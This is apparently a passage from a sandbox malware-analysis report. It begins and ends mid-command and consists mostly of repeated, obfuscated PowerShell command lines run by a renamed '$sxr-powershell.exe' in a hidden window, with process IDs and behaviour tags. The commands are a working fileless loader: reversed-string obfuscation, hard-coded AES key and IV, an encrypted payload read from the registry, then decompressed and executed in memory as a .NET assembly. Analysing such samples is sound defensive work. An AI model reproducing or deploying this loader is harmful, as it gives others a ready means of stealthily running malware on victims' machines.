$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        14⤵
        Hide Artifacts: Hidden Window
        
        PID:6592
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6732).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        14⤵
        
        PID:4396
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6732).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        14⤵
        
        PID:1188
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6732).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        14⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:1372
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = 